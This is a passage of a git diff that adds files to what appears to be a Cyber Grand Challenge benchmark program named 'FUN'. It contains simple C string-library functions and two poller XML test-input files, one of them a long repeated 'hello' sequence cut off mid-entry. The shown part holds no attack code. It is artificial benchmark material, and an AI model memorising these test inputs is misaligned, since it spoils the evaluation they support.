*cgc_strdup(const char *str) +{ + cgc_size_t n = cgc_strlen(str) + 1; + char *dup = cgc_malloc(n); + if (dup == NULL) + return NULL; + cgc_memcpy(dup, str, n); + return dup; +} diff --git a/exclude/FUN/lib/strlen.c b/exclude/FUN/lib/strlen.c new file mode 100755 index 000000000..6d26d1362 --- /dev/null +++ b/exclude/FUN/lib/strlen.c @@ -0,0 +1,36 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_string.h" + +cgc_size_t cgc_strlen(const char *s) +{ + const char *p = s; + while (*p) + p++; + + return p - s; +} diff --git a/exclude/FUN/lib/strncasecmp.c b/exclude/FUN/lib/strncasecmp.c new file mode 100644 index 000000000..44322bd1e --- /dev/null +++ b/exclude/FUN/lib/strncasecmp.c @@ -0,0 +1,45 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_ctype.h" +#include "cgc_stdlib.h" + +int cgc_strncasecmp(const char *s1, const char *s2, cgc_size_t n) +{ + unsigned char *_s1 = (unsigned char *)s1; + unsigned char *_s2 = (unsigned char *)s2; + + if (n-- == 0) + return 0; + + while (n && *_s1 && *_s2) + if (!(*_s1 == *_s2 || cgc_tolower(*_s1) == cgc_tolower(*_s2))) + break; + else + _s1++, _s2++; + + return cgc_tolower(*_s1) - cgc_tolower(*_s2); +} diff --git a/exclude/FUN/lib/strncmp.c b/exclude/FUN/lib/strncmp.c new file mode 100644 index 000000000..4e469da83 --- /dev/null +++ b/exclude/FUN/lib/strncmp.c @@ -0,0 +1,41 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_stdlib.h" + +int cgc_strncmp(const char *s1, const char *s2, cgc_size_t n) +{ + if (n-- == 0) + return 0; + + while (n-- && *s1 && *s2) + if (*s1 != *s2) + break; + else + s1++, s2++; + + return *s1 - *s2; +} diff --git a/exclude/FUN/lib/strncpy.c b/exclude/FUN/lib/strncpy.c new file mode 100644 index 000000000..dafdc0e4c --- /dev/null +++ b/exclude/FUN/lib/strncpy.c @@ -0,0 +1,17 @@ +#include "cgc_string.h" + +char *cgc_strncpy(char *dest, const char *src, cgc_size_t n) +{ + cgc_size_t i; + for (i = 0; i < n; i++) + { + dest[i] = src[i]; + if (dest[i] == '\0') + break; + } + + for (; i < n; i++) + dest[i] = 0; + + return dest; +} diff --git a/exclude/FUN/lib/strsep.c b/exclude/FUN/lib/strsep.c new file mode 100644 index 000000000..6a5a4268a --- /dev/null +++ b/exclude/FUN/lib/strsep.c @@ -0,0 +1,47 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_string.h" + +char *cgc_strsep(char **stringp, const char *delim) +{ + if (*stringp == NULL) + return NULL; + + char *i; + for (i = *stringp; *i && !cgc_strchr(delim, *i); i++); + + delim = *stringp; + + if (*i) { + *i = '\0'; + *stringp = i + 1; + } else { + *stringp = NULL; + } + + return (char *) delim; +} diff --git a/exclude/FUN/lib/strtol.c b/exclude/FUN/lib/strtol.c new file mode 100644 index 000000000..6ddcd02d6 --- /dev/null +++ b/exclude/FUN/lib/strtol.c @@ -0,0 +1,127 @@ +/* + * Author: Brian Pak + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#define IS_SPACE(c) ((c == ' ') || (c == '\t') || (c == '\f') || (c == '\n') || (c == '\v')) +#define IS_NUM(c) ((c >= '0') && (c <= '9')) +#define IS_ALPHA(c) (((c >= 'A') && (c <= 'Z')) || ((c >= 'a') && (c <= 'z'))) +#define IS_UPPER(c) ((c >= 'A') && (c <= 'Z')) + +long int cgc_strtol(const char *nptr, char **endptr, int base) +{ + int limit; + int neg = 0, val = 0, consumed = 0, n, a; + const char *p = nptr; + + /* Check validity of base */ + if (base == 1 || base > 36 || base < 0) + goto done; + + /* Skip white space */ + while (1) + { + if (IS_SPACE(*p)) + ++p; + else + break; + } + + /* Check sign symbol */ + if (*p == '-') + { + neg = 1; + ++p; + } + if (*p == '+') + ++p; + + /* Handle the base & its syntax */ + switch (base) + { + case 0: + if (*p == '0') + { + if (p[1] == 'x' || p[1] == 'X') + { + p += 2; + base = 16; + } + else + { + ++p; + base = 8; + } + } + else + base = 10; + break; + case 16: + if (*p == '0' && (p[1] == 'x' || p[1] == 'X')) + { + p += 2; + base = 16; + } + break; + } + + /* Convert the rest of the string into int */ + while ((n = IS_NUM(*p)) || (a = IS_ALPHA(*p))) + { + if (n) + n = *p - '0'; + else if (a) + { + if (IS_UPPER(*p)) + n = *p - 'A'; + else + n = *p - 'a'; + // "... In bases above 10, the letter 'A' in either upper or lower case represents 10, + // 'B' represents 11, and so forth, with 'Z' representing 35. ..." + n += 10; + } + + // "... stopping at the first character which is not a valid digit in the given base. ..." + if (n >= base) + break; + + val *= base; + val += n; + ++consumed; + ++p; + } + + if (neg) + val = -val; + +done: + if (endptr) + *endptr = (char *)(consumed > 0 ? p : nptr); + + return val; + +} + +long unsigned int cgc_strtoul(const char *nptr, char **endptr, int base) +{ + return (long unsigned int)cgc_strtol(nptr, endptr, base); +} diff --git a/exclude/FUN/poller/for-release/POLL_00001.xml b/exclude/FUN/poller/for-release/POLL_00001.xml new file mode 100644 index 000000000..e1192b2a5 --- /dev/null +++ b/exclude/FUN/poller/for-release/POLL_00001.xml @@ -0,0 +1,33 @@ + + + +service + + \x99q + 1\x00 + 12\x0bThe market. + \x01 + 1\x00 + \xff\x50\x79\x32\x38 + \x01 + 1\x00 + \x99q + 1\x00 + 38\x25These cuticle dine with him customer. + \x00 + 1\x00 + \x99q + 1\x00 + 95\x5eThey are beggars of fortune through by law may be sufficient to put to one principal breeders. + \x01 + 1\x00 + \xff\x32\x79\x89\x35 + \xff\xac\xde\x12\x34 + 1\x00 + \xffC\x26F8\x06hello1 + 1\x00 + \xa8\x84 + 1\x00 + 47\x2eThe markets will observe that horrid practice. + + diff --git a/exclude/FUN/poller/for-testing/POLL_00001.xml b/exclude/FUN/poller/for-testing/POLL_00001.xml new file mode 100644 index 000000000..eef5eb0ac --- /dev/null +++ b/exclude/FUN/poller/for-testing/POLL_00001.xml @@ -0,0 +1,11 @@ + + + +service + + +\xffC\x26F8\x06hello0\xffC\x26F8\x06hello1\xffC\x26F8\x06hello2\xffC\x26F8\x06hello3\xffC\x26F8\x06hello4\xffC\x26F8\x06hello5\xffC\x26F8\x06hello6\xffC\x26F8\x06hello7\xffC\x26F8\x06hello8\xffC\x26F8\x06hello9\xffC\x26F8\x07hello10\xffC\x26F8\x07hello11\xffC\x26F8\x07hello12\xffC\x26F8\x07hello13\xffC\x26F8\x07hello14\xffC\x26F8\x07hello15\xffC\x26F8\x07hello16\xffC\x26F8\x07hello17\xffC\x26F8\x07hello18\xffC\x26F8\x07hello19\xffC\x26F8\x07hello20\xffC\x26F8\x07hello21\xffC\x26F8\x07hello22\xffC\x26F8\x07hello23\xffC\x26F8\x07hello24\xffC\x26F8\x07hello25\xffC\x26F8\x07hello26\xffC\x26F8\x07hello27\xffC\x26F8\x07hello28\xffC\x26F8\x07hello29\xffC\x26F8\x07hello30\xffC\x26F8\x07hello31\xffC\x26F8\x07hello32\xffC\x26F8\x07hello33\xffC\x26F8\x07hello34\xffC\x26F8\x07hello35\xffC\x26F8\x07hello36\xffC\x26F8\x07hello37\xffC\x26F8\x07hello38\xffC\x26F8\x07hello39\xffC\x26F8\x07hello40\xffC\x26F8\x07hello41\xffC\x26F8\x07hello42\xffC\x26F8\x07hello43\xffC\x26F8\x07hello44\xffC\x26F8\x07hello45\xffC\x26F8\x07hello46\xffC\x26F8\x07hello47\xffC\x26F8\x07hello48\xffC\x26F8\x07hello49\xffC\x26F8\x07hello50\xffC\x26F8\x07hello51\xffC\x26F8\x07hello52\xffC\x26F8\x07hello53\xffC\x26F8\x07hello54\xffC\x26F8\x07hello55\xffC\x26F8\x07hello56\xffC\x26F8\x07hello57\xffC\x26F8\x07hello58\xffC\x26F8\x07hello59\xffC\x26F8\x07hello60\xffC\x26F8\x07hello61\xffC\x26F8\x07hello62\xffC\x26F8\x07hello63\xffC\x26F8\x07hello64\xffC\x26F8\x07hello65\xffC\x26F8\x07hello66\xffC\x26F8\x07hello67\xffC\x26F8\x07hello68\xffC\x26F8\x07hello69\xffC\x26F8\x07hello70\xffC\x26F8\x07hello71\xffC\x26F8\x07hello72\xffC\x26F8\x07hello73\xffC\x26F8\x07hello74\xffC\x26F8\x07hello75\xffC\x26F8\x07hello76\xffC\x26F8\x07hello77\xffC\x26F8\x07hello78\xffC\x26F8\x07hello79\xffC\x26F8\x07hello80\xffC\x26F8\x07hello81\xffC\x26F8\x07hello82\xffC\x26F8\x07hello83\xffC\x26F8\x07hello84\xffC\x26F8\x07hello85\xffC\x26F8\x07hello86\xffC\x26F8\x07hello87\xffC\x26F8\x07hello88\xffC\x26F8\x07hello89\xffC\x26F8\x07hello90\xffC\x26F8\x07hello91\xffC\x26F8\x07hello92\xffC\x26F8\x07hello93\xffC\x26F8\x07hello94\xffC\x26F8\x07hello95\xffC\x26F8\x07hello96\xffC\x26F8\x07hello97\xffC\x26F8\x07hello98\xffC\x26F8\x07hello99\xffC\x26F8\x08hello100\xffC\x26F8\x08hello101\xffC\x26F8\x08hello102\xffC\x26F8\x08hello103\xffC\x26F8\x08hello104\xffC\x26F8\x08hello105\xffC\x26F8\x08hello106\xffC\x26F8\x08hello107\xffC\x26F8\x08hello108\xffC\x26F8\x08hello109\xffC\x26F8\x08hello110\xffC\x26F8\x08hello111\xffC\x26F8\x08hello112\xffC\x26F8\x08hello113\xffC\x26F8\x08hello114\xffC\x26F8\x08hello115\xffC\x26F8\x08hello116\xffC\x26F8\x08hello117\xffC\x26F8\x08hello118\xffC\x26F8\x08hello119\xffC\x26F8\x08hello120\xffC\x26F8\x08hello121\xffC\x26F8\x08hello122\xffC\x26F8\x08hello123\xffC\x26F8\x08hello124\xffC\x26F8\x08hello125\xffC\x26F8\x08hello126\xffC\x26F8\x08hello127\xffC\x26F8\x08hello128\xffC\x26F8\x08hello129\xffC\x26F8\x08hello130\xffC\x26F8\x08hello131\xffC\x26F8\x08hello132\xffC\x26F8\x08hello133\xffC\x26F8\x08hello134\xffC\x26F8\x08hello135\xffC\x26F8\x08hello136\xffC\x26F8\x08hello137\xffC\x26F8\x08hello138\xffC\x26F8\x08hello139\xffC\x26F8\x08hello140\xffC\x26F8\x08hello141\xffC\x26F8\x08hello142\xffC\x26F8\x08hello143\xffC\x26F8\x08hello144\xffC\x26F8\x08hello145\xffC\x26F8\x08hello146\xffC\x26F8\x08hello147\xffC\x26F8\x08hello148\xffC\x26F8\x08hello149\xffC\x26F8\x08hello150\xffC\x26F8\x08hello151\xffC\x26F8\x08hello152\xffC\x26F8\x08hello153\xffC\x26F8\x08hello154\xffC\x26F8\x08hello155\xffC\x26F8\x08hello156\xffC\x26F8\x08hello157\xffC\x26F8\x08hello158\xffC\x26F8\x08hello159\xffC\x26F8\x08hello160\xffC\x26F8\x08hello161\xffC\x26F8\x08hello162\xffC\x26F8\x08hello163\xffC\x26F8\x08hello164\xffC\x26F8\x08hello165\xffC\x26F8\x08hello166\xffC\x26F8\x08hello167\xffC\x26F8\x08hello168\xffC\x26F8\x08hello169\xffC\x26F8\x08hello170\xffC\x26F8\x08hello171\xffC\x26F8\x08hello172\xffC\x26F8\x08hello173\xffC\x26F8\x08hello174\xffC\x26F8\x08hello175\xffC\x26F8\x08hello176\xffC\x26F8\x08hello177\xffC\x26F8\x08hello178\xffC\x26F8\x08hello179\xffC\x26F8\x08hello180\xffC\x26F8\x08hello181\xffC\x26F8\x08hello182\xffC\x26F8\x08hello183\xffC\x26F8\x08hello184\xffC\x26F8\x08hello185\xffC\x26F8\x08hello186\xffC\x26F8\x08hello187\xffC\x26F8\x08hello188\xffC\x26F8\x08hello189\xffC\x26F8\x08hello190\xffC\x26F8\x08hello191\xffC\x26F8\x08hello192\xffC\x26F8\x08hello193\xffC\x26F8\x08hello194\xffC\x26F8\x08hello195\xffC\x26F8\x08hello196\xffC\x26F8\x08hello197\xffC\x26F8\x08hello198\xffC\x26F8\x08hello199\xffC\x26F8\x08hello200\xffC\x26F8\x08hello201\xffC\x26F8\x08hello202\xffC\x26F8\x08hello203\xffC\x26F8\x08hello204\xffC\x26F8\x08hello205\xffC\x26F8\x08hello206\xffC\x26F8\x08hello207\xffC\x26F8\x08hello208\xffC\x26F8\x08hello209\xffC\x26F8\x08hello210\xffC\x26F8\x08hello211\xffC\x26F8\x08hello212\xffC\x26F8\x08hello213\xffC\x26F8\x08hello214\xffC\x26F8\x08hello215\xffC\x26F8\x08hello216\xffC\x26F8\x08hello217\xffC\x26F8\x08hello218\xffC\x26F8\x08hello219\xffC\x26F8\x08hello220\xffC\x26F8\x08hello221\xffC\x26F8\x08hello222\xffC\x26F8\x08hello223\xffC\x26F8\x08hello224\xffC\x26F8\x08hello225\xffC\x26F8\x08hello226\xffC\x26F8\x08hello227\xffC\x26F8\x08hello228\xffC\x26F8\x08hello229\xffC\x26F8\x08hello230\xffC\x26F8\x08hello231\xffC\x26F8\x08hello232\xffC\x26F8\x08hello233\xffC\x26F8\x08hello234\xffC\x26F8\x08hello235\xffC\x26F8\x08hello236\xffC\x26F8\x08hello237\xffC\x26F8\x08hello238\xffC\x26F8\x08hello239\xffC\x26F8\x08hello240\xffC\x26F8\x08hello241\xffC\x26F8\x08hello242\xffC\x26F8\x08hello243\xffC\x26F8\x08hello244\xffC\x26F8\x08hello245\xffC\x26F8\x08hello246\xffC\x26F8\x08hello247\xffC\x26F8\x08hello248\xffC\x26F8\x08hello249\xffC\x26F8\x08hello250\xffC\x26F8\x08hello251\xffC\x26F8\x08hello252\xffC\x26F8\x08hello253\xffC\x26F8\x08hello254\xffC\x26F8\x08hello255\xffC\x26F8\x08hello256\xffC\x26F8\x08hello257\xffC\x26F8\x08hello258\xffC\x26F8\x08hello259\xffC\x26F8\x08hello260\xffC\x26F8\x08hello261\xffC\x26F8\x08hello262\xffC\x26F8\x08hello263\xffC\x26F8\x08hello264\xffC\x26F8\x08hello265\xffC\x26F8\x08hello266\xffC\x26F8\x08hello267\xffC\x26F8\x08hello268\xffC\x26F8\x08hello269\xffC\x26F8\x08hello270\xffC\x26F8\x08hello271\xffC\x26F8\x08hello272\xffC\x26F8\x08hello273\xffC\x26F8\x08hello274\xffC\x26F8\x08hello275\xffC\x26F8\x08hello276\xffC\x26F8\x08hello277\xffC\x26F8\x08hello278\xffC\x26F8\x08hello279\xffC\x26F8\x08hello280\xffC\x26F8\x08hello281\xffC\x26F8\x08hello282\xffC\x26F8\x08hello283\xffC\x26F8\x08hello284\xffC\x26F8\x08hello285\xffC\x26F8\x08hello286\xffC\x26F8\x08hello287\xffC\x26F8\x08hello288\xffC\x26F8\x08hello289\xffC\x26F8\x08hello290\xffC\x26F8\x08hello291\xffC\x26F8\x08hello292\xffC\x26F8\x08hello293\xffC\x26F8\x08hello294\xffC\x26F8\x08hello295\xffC\x26F8\x08hello296\xffC\x26F8\x08hello297\xffC\x26F8\x08hello298\xffC\x26F8\x08hello299\xffC\x26F8\x08hello300\xffC\x26F8\x08hello301\xffC\x26F8\x08hello302\xffC\x26F8\x08hello303\xffC\x26F8\x08hello304\xffC\x26F8\x08hello305\xffC\x26F8\x08hello306\xffC\x26F8\x08hello307\xffC\x26F8\x08hello308\xffC\x26F8\x08hello309\xffC\x26F8\x08hello310\xffC\x26F8\x08hello311\xffC\x26F8\x08hello312\xffC\x26F8\x08hello313\xffC\x26F8\x08hello314\xffC\x26F8\x08hello315\xffC\x26F8\x08hello316\xffC\x26F8\x08hello317\xffC\x26F8\x08hello318\xffC\x26F8\x08hello319\xffC\x26F8\x08hello320\xffC\x26F8\x08hello321\xffC\x26F8\x08hello322\xffC\x26F8\x08hello323\xffC\x26F8\x08hello324\xffC\x26F8\x08hello325\xffC\x26F8\x08hello326\xffC\x26F8\x08hello327\xffC\x26F8\x08hello328\xffC\x26F8\x08hello329\xffC\x26F8\x08hello330\xffC\x26F8\x08hello331\xffC\x26F8\x08hello332\xffC\x26F8\x08hello333\xffC\x26F8\x08hello334\xffC\x26F8\x08hello335\xffC\x26F8\x08hello336\xffC\x26F8\x08hello337\xffC\x26F8\x08hello338\xffC\x26F8\x08hello339\xffC\x26F8\x08hello340\xffC\x26F8\x08hello341\xffC\x26F8\x08hello342\xffC\x26F8\x08hello343\xffC\x26F8\x08hello344\xffC\x26F8\x08hello345\xffC\x26F8\x08hello346\xffC\x26F8\x08hello347\xffC\x26F8\x08hello348\xffC\x26F8\x08hello349\xffC\x26F8\x08hello350\xffC\x26F8\x08hello351\xffC\x26F8\x08hello352\xffC\x26F8\x08hello353\xffC\x26F8\x08hello354\xffC\x26F8\x08hello355\xffC\x26F8\x08hello356\xffC\x26F8\x08hello357\xffC\x26F8\x08hello358\xffC\x26F8\x08hello359\xffC\x26F8\x08hello360\xffC\x26F8\x08hello361\xffC\x26F8\x08hello362\xffC\x26F8\x08hello363\xffC\x26F8\x08hello364\xffC\x26F8\x08hello365\xffC\x26F8\x08hello366\xffC\x26F8\x08hello367\xffC\x26F8\x08hello368\xffC\x26F8\x08hello369\xffC\x26F8\x08hello370\xffC\x26F8\x08hello371\xffC\x26F8\x08hello372\xffC\x26F8\x08hello373\xffC\x26F8\x08hello374\xffC\x26F8\x08hello375\xffC\x26F8\x08hello376\xffC\x26F8\x08hello377\xffC\x26F8\x08hello378\xffC\x26F8\x08hello379\xffC\x26F8\x08hello380\xffC\x26F8\x08hello381\xffC\x26F8\x08hello382\xffC\x26F8\x08hello383\xffC\x26F8\x08hello384\xffC\x26F8\x08hello385\xffC\x26F8\x08hello386\xffC\x26F8\x08hello387\xffC\x26F8\x08hello388\xffC\x26F8\x08hello389\xffC\x26F8\x08hello390\xffC\x26F8\x08hello391\xffC\x26F8\x08hello392\xffC\x26F8\x08hello393\xffC\x26F8\x08hello394\xffC\x26F8\x08hello395\xffC\x26F8\x08hello396\xffC\x26F8\x08hello397\xffC\x26F8\x08hello398\xffC\x26F8\x08hello399\xffC\x26F8\x08hello400\xffC\x26F8\x08hello401\xffC\x26F8\x08hello402\xffC\x26F8\x08hello403\xffC\x26F8\x08hello404\xffC\x26F8\x08hello405\xffC\x26F8\x08hello406\xffC\x26F8\x08hello407\xffC\x26F8\x08hello408\xffC\x26F8\x08hello409\xffC\x26F8\x08hello410\xffC\x26F8\x08hello411\xffC\x26F8\x08hello412\xffC\x26F8\x08hello413\xffC\x26F8\x08hello414\xffC\x26F8\x08hello415\xffC\x26F8\x08hello416\xffC\x26F8\x08hello417\xffC\x26F8\x08hello418\xffC\x26F8\x08hello419\xffC\x26F8\x08hello420\xffC\x26F8\x08hello421\xffC\x26F8\x08hello422\xffC\x26F8\x08hello423\xffC\x26F8\x08hello424\xffC\x26F8\x08hello425\xffC\x26F8\x08hello426\xffC\x26F8\x08hello427\xffC\x26F8\x08hello428\xffC\x26F8\x08hello429\xffC\x26F8\x08hello430\xffC\x26F8\x08hello431\xffC\x26F8\x08hello432\xffC\x26F8\x08hello433\xffC\x26F8\x08hello434\xffC\x26F8\x08hello435\xffC\x26F8\x08hello436\xffC\x26F8\x08hello437\xffC\x26F8\x08hello438\xffC\x26F8\x08hello439\xffC\x26F8\x08hello440\xffC\x26F8\x08hello441\xffC\x26F8\x08hello442\xffC\x26F8\x08hello443\xffC\x26F8\x08hello444\xffC\x26F8\x08hello445\xffC\x26F8\x08hello446\xffC\x26F8\x08hello447\xffC\x26F8\x08hello448\xffC\x26F8\x08hello449\xffC\x26F8\x08hello450\xffC\x26F8\x08hello451\xffC\x26F8\x08hello452\xffC\x26F8\x08hello453\xffC\x26F8\x08hello454\xffC\x26F8\x08hello455\xffC\x26F8\x08hello456\xffC\x26F8\x08hello457\xffC\x26F8\x08hello458\xffC\x26F8\x08hello459\xffC\x26F8\x08hello460\xffC\x26F8\x08hello461\xffC\x26F8\x08hello462\xffC\x26F8\x08hello463\xffC\x26F8\x08hello464\xffC\x26F8\x08hello465\xffC\x26F8\x08hello466\xffC\x26F8\x08hello467\xffC\x26F8\x08hello468\xffC\x26F8\x08hello469\xffC\x26F8\x08hello470\xffC\x26F8\x08hello471\xffC\x26F8\x08hello472\xffC\x26F8\x08hello473\xffC\x26F8\x08hello474\xffC\x26F8\x08hello475\xffC\x26F8\x08hello476\xffC\x26F8\x08hello477\xffC\x26F8\x08hello478\xffC\x26F8\x08hello479\xffC\x26F8\x08hello480\xffC\x26F8\x08hello481\xffC\x26F8\x08hello482\xffC\x26F8\x08hello483\xffC\x26F8\x08hello484\xffC\x26F8\x08hello485\xffC\x26F8\x08hello486\xffC\x26F8\x08hello487\xffC\x26F8\x08hello488\xffC\x26F8\x08hello489\xffC\x26F8\x08hello490\xffC\x26F8\x08hello491\xffC\x26F8\x08hello492\xffC\x26F8\x08hello493\xffC\x26F8\x08hello494\xffC\x26F8\x08hello495\xffC\x26F8\x08hello496\xffC\x26F8\x08hello497\xffC\x26F8\x08hello498\xffC\x26F8\x08hello499\xffC\x26F8\x08hello500\xffC\x26F8\x08hello501\xffC\x26F8\x08hello502\xffC\x26F8\x08hello503\xffC\x26F8\x08hello504\xffC\x26F8\x08hello505\xffC\x26F8\x08hello506\xffC\x26F8\x08hello507\xffC\x26F8\x08hello508\xffC\x26F8\x08hello509\xffC\x26F8\x08hello510\xffC\x26F8\x08hello511\xffC\x26F8\x08hello512\xffC\x26F8\x08hello513\xffC\x26F8\x08hello514\xffC\x26F8\x08hello515\xffC\x26F8\x08hello516\xffC\x26F8\x08hello517\xffC\x26F8\x08hello518\xffC\x26F8\x08hello519\xffC\x26F8\x08hello520\xffC\x26F8\x08hello521\xffC\x26F8\x08hello522\xffC\x26F8\x08hello523\xffC\x26F8\x08hello524\xffC\x26F8\x08hello525\xffC\x26F8\x08hello526\xffC\x26F8\x08hello527\xffC\x26F8\x08hello528\xffC\x26F8\x08hello529\xffC\x26F8\x08hello530\xffC\x26F8\x08hello531\xffC\x26F8\x08hello532\xffC\x26F8\x08hello533\xffC\x26F8\x08hello534\xffC\x26F8\x08hello535\xffC\x26F8\x08hello536\xffC\x26F8\x08hello537\xffC\x26F8\x08hello538\xffC\x26F8\x08hello539\xffC\x26F8\x08hello540\xffC\x26F8\x08hello541\xffC\x26F8\x08hello542\xffC\x26F8\x08hello543\xffC\x26F8\x08hello544\xffC\x26F8\x08hello545\xffC\x26F8\x08hello546\xffC\x26F8\x08hello547\xffC\x26F8\x08hello548\xffC\x26F8\x08hello549\xffC\x26F8\x08hello550\xffC\x26F8\x08hello551\xffC\x26F8\x08hello552\xffC\x26F8\x08hello553\xffC\x26F8\x08hello554\xffC\x26F8\x08hello555\xffC\x26F8\x08hello556\xffC\x26F8\x08hello557\xffC\x26F8\x08hello558\xffC\x26F8\x08hello559\xffC\x26F8\x08hello560\xffC\x26F8\x08hello561\xffC\x26F8\x08hello562\xffC\x26F8\x08hello563\xffC\x26F8\x08hello564\xffC\x26F8\x08hello565\xffC\x26F8\x08hello566\xffC\x26F8\x08hello567\xffC\x26F8\x08hello568\xffC\x26F8\x08hello569\xffC\x26F8\x08hello570\xffC\x26F8\x08hello571\xffC\x26F8\x08hello572\xffC\x26F8\x08hello573\xffC\x26F8\x08hello574\xffC\x26F8\x08hello575\xffC\x26F8\x08hello576\xffC\x26F8\x08hello577\xffC\x26F8\x08hello578\xffC\x26F8\x08hello579\xffC\x26F8\x08hello580\xffC\x26F8\x08hello581\xffC\x26F8\x08hello582\xffC\x26F8\x08hello583\xffC\x26F8\x08hello584\xffC\x26F8\x08hello585\xffC\x26F8\x08hello586\xffC\x26F8\x08hello587\xffC\x26F8\x08hello588\xffC\x26F8\x08hello589\xffC\x26F8\x08hello590\xffC\x26F8\x08hello591\xffC\x26F8\x08hello592\xffC\x26F8\x08hello593\xffC\x26F8\x08hello594\xffC\x26F8\x08hello595\xffC\x26F8\x08hello596\xffC\x26F8\x08hello597\xffC\x26F8\x08hello598\xffC\x26F8\x08hello599\xffC\x26F8\x08hello600\xffC\x26F8\x08hello601\xffC\x26F8\x08hello602\xffC\x26F8\x08hello603\xffC\x26F8\x08hello604\xffC\x26F8\x08hello605\xffC\x26F8\x08hello606\xffC\x26F8\x08hello607\xffC\x26F8\x08hello608\xffC\x26F8\x08hello609\xffC\x26F8\x08hello610\xffC\x26F8\x08hello611\xffC\x26F8\x08hello612\xffC\x26F8\x08hello613\xffC\x26F8\x08hello614\xffC\x26F8\x08hello615\xffC\x26F8\x08hello616\xffC\x26F8\x